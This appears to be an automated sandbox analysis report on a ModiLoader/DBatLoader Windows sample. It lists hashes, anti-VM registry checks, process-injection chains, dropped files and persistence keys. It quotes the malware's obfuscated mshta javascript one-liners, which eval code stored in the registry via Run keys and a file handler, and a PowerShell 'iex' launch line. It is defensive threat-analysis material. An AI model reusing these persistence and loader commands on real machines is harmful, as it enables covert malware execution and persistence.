Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows7_x64
- resource: win7-20231129-en
- resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- submitted: 07-05-2024 05:27
Static task: static1
Behavioral task: behavioral1
  Sample: 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
  Resource: win10v2004-20240419-en
General
- Target: 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
- Size: 356KB
- MD5: 1f98f4990bbf6b268365ba7fdf56405f
- SHA1: e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317
- SHA256: 5f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f
- SHA512: bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f
- SSDEEP: 6144:Sae/c0RVIqxFu4s2a9XHCd9hxJamsAT4k+wCGbfQfojzMBR5h:W/cMVDxFu43cHYf1TPCAxjzMj
Malware Config
Signatures
- ModiLoader, DBatLoader
  ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
- Process spawned unexpected child process 1 IoCs
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description | pid | pid_target | process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2540 | 2052 | mshta.exe
- Checks for common network interception software 1 TTPs
  Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
- Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
- Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | regsvr32.exe
- Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  Processes:
    description | ioc | process
    File opened (read-only) | C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys | regsvr32.exe
- ModiLoader Second Stage 64 IoCs
- Looks for VMWare Tools registry key 2 TTPs 3 IoCs
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | regsvr32.exe
- Checks BIOS information in registry 2 TTPs 2 IoCs
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | regsvr32.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | regsvr32.exe
- Deletes itself 1 IoCs
  Processes:
    pid | process
    2140 | regsvr32.exe
- Drops startup file 1 IoCs
  Processes:
    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk | regsvr32.exe
- Executes dropped EXE 1 IoCs
  Processes:
    pid | process
    2308 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
- Loads dropped DLL 2 IoCs
  Processes:
    pid | process
    2340 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    2340 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
- Adds Run key to start application 2 TTPs 3 IoCs
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:BD9HFvlyJ1=\"uR7kzy\";Lp3=new%20ActiveXObject(\"WScript.Shell\");ttp4sMhEJ=\"a5d\";Ko5k6u=Lp3.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\hsgrudze\\\\zdxvakv\");wDW5uLPk=\"aVWk\";eval(Ko5k6u);VZMTwY1wp=\"Rz\";" | regsvr32.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:QUsnyCm4=\"6ycAtR\";nP8=new%20ActiveXObject(\"WScript.Shell\");y8eqNivYR=\"q6w\";CqF37O=nP8.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");f6KCIIYb=\"5IubddsEY\";eval(CqF37O);zG6PSey=\"IIHLonuFAG\";" | regsvr32.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\416844\\eecdc5.lnk\"" | regsvr32.exe
- Maps connected drives based on registry 3 TTPs 2 IoCs
  Disk information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | regsvr32.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | regsvr32.exe
- Drops file in System32 directory 1 IoCs
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- Suspicious use of SetThreadContext 2 IoCs
  Processes:
    description | pid | process | target process
    PID 2812 set thread context of 2140 | 2812 | powershell.exe | regsvr32.exe
    PID 2140 set thread context of 2876 | 2140 | regsvr32.exe | regsvr32.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- Modifies Internet Explorer settings 2 IoCs
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\International | regsvr32.exe
- Modifies registry class 7 IoCs
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command | regsvr32.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command\ = "mshta \"javascript:i7KylNfXv=\"LZZHoS18\";W9t=new ActiveXObject(\"WScript.Shell\");vMC7MiqH5v=\"I\";EZz0z2=W9t.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");X4Hilzcyd=\"l\";eval(EZz0z2);ba9mfL3fQW=\"n6zJegkNXW\";\"" | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d | regsvr32.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d\ = "81b494" | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494 | regsvr32.exe
    Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell | regsvr32.exe
- Suspicious behavior: EnumeratesProcesses 64 IoCs
  Processes:
    pid | process
    2340 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe (2 entries)
    2812 | powershell.exe
    2308 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe (2 entries)
    2140 | regsvr32.exe (all remaining entries)
- Suspicious behavior: MapViewOfSection 2 IoCs
  Processes:
    pid | process
    2812 | powershell.exe
    2140 | regsvr32.exe
- Suspicious use of AdjustPrivilegeToken 1 IoCs
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 2812 | powershell.exe
- Suspicious use of UnmapMainImage 2 IoCs
  Processes:
    pid | process
    2340 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    2308 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
- Suspicious use of WriteProcessMemory 24 IoCs
  Processes:
    description | pid | process | target process
    PID 2340 wrote to memory of 2308 | 2340 | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe | 1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe (4 entries)
    PID 2540 wrote to memory of 2812 | 2540 | mshta.exe | powershell.exe (4 entries)
    PID 2812 wrote to memory of 2140 | 2812 | powershell.exe | regsvr32.exe (8 entries)
    PID 2140 wrote to memory of 2876 | 2140 | regsvr32.exe | regsvr32.exe (8 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"
  PID: 2340
  Signatures:
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Looks for VMWare Tools registry key
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of UnmapMainImage
    - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
    Command line: "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe"
    PID: 2308
    Signatures:
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Looks for VMWare Tools registry key
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of UnmapMainImage
- C:\Windows\system32\mshta.exe
  Command line: "C:\Windows\system32\mshta.exe" javascript:wh5VXfF0="RGcF6bBbn8";J3G3=new%20ActiveXObject("WScript.Shell");SsG4Jhybu="zl6rcltazH";Lcu0I=J3G3.RegRead("HKLM\\software\\Wow6432Node\\QpgStiGQ4\\NzOMWkbXt");Lqt0swCDV="XirWa1";eval(Lcu0I);cRNm3TX="ny";
  PID: 2540
  Signatures:
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:amuexm
    PID: 2812
    Signatures:
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\regsvr32.exe
      Command line: regsvr32.exe
      PID: 2140
      Signatures:
        - Looks for VirtualBox Guest Additions in registry
        - Looks for VirtualBox drivers on disk
        - Looks for VMWare Tools registry key
        - Checks BIOS information in registry
        - Deletes itself
        - Drops startup file
        - Adds Run key to start application
        - Maps connected drives based on registry
        - Suspicious use of SetThreadContext
        - Modifies Internet Explorer settings
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\regsvr32.exe
        Command line: "C:\Windows\SysWOW64\regsvr32.exe"
        PID: 2876
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Downloads
- \Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\1f98f4990bbf6b268365ba7fdf56405f_JaffaCakes118.exe
  Filesize: 356KB
  MD5: 1f98f4990bbf6b268365ba7fdf56405f
  SHA1: e1f5a46baf14c6fdd67fcb1b3d37b54ad9a52317
  SHA256: 5f2ebf4e711218b1c47e8c83cbe354a369efcfed3835c480c7ae08001dfbdb8f
  SHA512: bbf91e6a1a1c2a50f630d4ec347c7678647a78ce976af3db92b62498f77af84f506e1dadd4d9d8757c9f2297e80bbaf96e8575f5cb331800465417a6ed08717f